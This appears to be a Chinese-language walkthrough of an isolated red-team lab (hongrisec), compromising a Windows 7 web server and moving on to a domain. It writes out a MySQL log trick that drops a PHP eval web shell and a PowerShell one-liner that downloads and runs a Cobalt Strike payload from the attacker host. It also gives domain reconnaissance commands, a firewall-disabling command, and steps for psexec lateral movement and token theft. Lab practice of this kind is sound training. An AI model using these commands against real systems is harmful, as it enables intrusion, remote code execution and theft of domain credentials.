1、下载好镜像文件。
2、直接vmware启动即可。
这里我用自己的win10虚拟机作为攻击机,设置为双网卡NAT,vm2(192.168.234.131)
设置win7为双网卡,vm1(192.168.52.143),vm2(192.168.234.130)
设置win08单网卡vm1(192.168.52.138),win2k3为单网卡vm1(192.168.52.141)
这样win10就可以访问win7,但不能直接访问win08和win2k3。
三台靶机的初始密码都是hongrisec@2019 ,初次登录需要改密码,我改成了hongrisec@2020。
进入win7,开启web服务。
渗透过程:
1、简单地扫描下一win7端口
2、访问80端口是一个phpstudy探针,扫描一下目录,发现一个phpmyadmin目录和beifen.rar文件。
直接root/root就可以进入。
然后就是mysql日志写shell就行,绝对路径在探针上有显示。
set global general_log = "ON";
set global general_log_file = "C:/phpStudy/www/shell.php";
SELECT '<?php eval($_POST["x"]);?>'
4、使用antsword连接一下。
5、antsword执行以下命令,CS上线一下。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.234.131:80/a'))"
一些内网信息收集的小命令
使用 ipconfig /all 查看 DNS 服务器:
发现 DNS 服务器名为 god.org,查看域信息:net view
查看主域信息:net view /domain
查看时间服务器:net time /domain
发现能够执行,说明此台机器在域中 (若是此命令在显示域处显示 WORKGROUP,则不存在域,若是报错:发生系统错误 5,则存在域,但该用户不是域用户)
查询当前的登录域与用户信息:net config workstation
查看当前域的所有用户:net user /domain
查看所有域成员计算机列表:net group "domain computers" /domain
查看域管理员:net group "domain admins" /domain
查看域控制器:net group "domain controllers" /domain
查看企业管理组:net group "enterprise admins" /domain
查看域控,升级为域控时,本地账户也成为域管:net localgroup administrators /domain
获取域密码信息:net accounts /domain
6、抓一下密码,扫描内网主机,psexec批量上线。
可以看到192.168.52.138是域控服务器。
由于192.168.52.0/24段不能直接连接到192.168.234.131(win10攻击机地址),所以需要CS派生smb beacon。让内网的主机连接到win7上。
SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个 Beacons 链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacons 使用 Windows 命名管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时可能发挥奇效。
监听器生成一个SMB Beacon
7、如果没有弹回来,可能是你攻击机防火墙策略问题,开通规则即可。
也可以索性把防火墙先关掉。
netsh advfirewall set allprofiles state off
8、除了直接使用获取到的 hash 值,也可以直接窃取 GOD\Administrator 的 token 来登录其他主机。
选择 beacon 右键 -> 目标 -> 进程列表
选择 GOD\Administrator 的 token 盗取:
然后在选择令牌处勾选使用当前 token 即可:
扫一扫
3864
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
